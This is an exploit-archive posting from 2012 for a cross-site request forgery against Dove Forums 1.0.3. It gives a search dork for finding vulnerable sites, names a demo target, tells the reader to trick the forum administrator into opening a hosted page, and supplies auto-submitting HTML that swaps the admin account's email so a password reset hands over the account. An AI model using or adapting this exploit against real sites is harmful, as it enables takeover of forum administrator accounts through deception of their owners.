Home / exploits Dove Forums 1.0.3 Cross Site Request Forgery
Posted on 27 June 2012
In The Name Of Allah +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ # Exploit Title:Dove Forums-Add admin CSRF # @@@@@ | # Date : 2012-06-26 # @ @ + # Author :Ashiyane Digitl Security Team # @ @@@ @ | # Vendor :http://www.doveforums.com/ # @ @ @ @ + # Version: 1.0.3 # @ @@ @ | # e-mail: Gigelaknak [at] Yahoo [dot] com # W @ @ W + # Visit us: ashiyane.org/forums # s s | # Category: Webapps # s s + # Google dork:"Powered By Dove Forums Version: 1.0.3"# s s | # Demo site: http://allcrew.eu/forum/ # SS + # Tested on: # s s | # s s + # W W | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ 1.Replace the forum path of your target with http://localhost/ at the second line of exploit code 2.Replace your e-mail with Gigelaknak@yahoo.com at the third line of exploit code 3.Save the exploit code as .html file and upload it some where ,Then give the link to admin using social engineering ! 4.After admin opened the link ,click on the "Forgot Password" and get the Admin password on your E-mail ;) 5. Good Luck B-) Tnx 2 N.A And all Iranian Hackers ... Exploit Code : <html> <form name="csrf" action="http://localhost/index.php/admin/users/update/1" class="form" method="post" accept-charset="utf-8"> <input type="hidden" name="Username" value="admin" id="Username" class="textbox" /> <input type="hidden" name="Email" value="Gigelaknak@yahoo.com" id="Email" class="textbox" /> <select name="group"> <option value="1" selected="selected">admin</option> </select> <input type="checkbox" name="Active" value="1" checked="checked" id="Active" class="checkbox" /> </from> <script>document.csrf.submit();</script> </html>
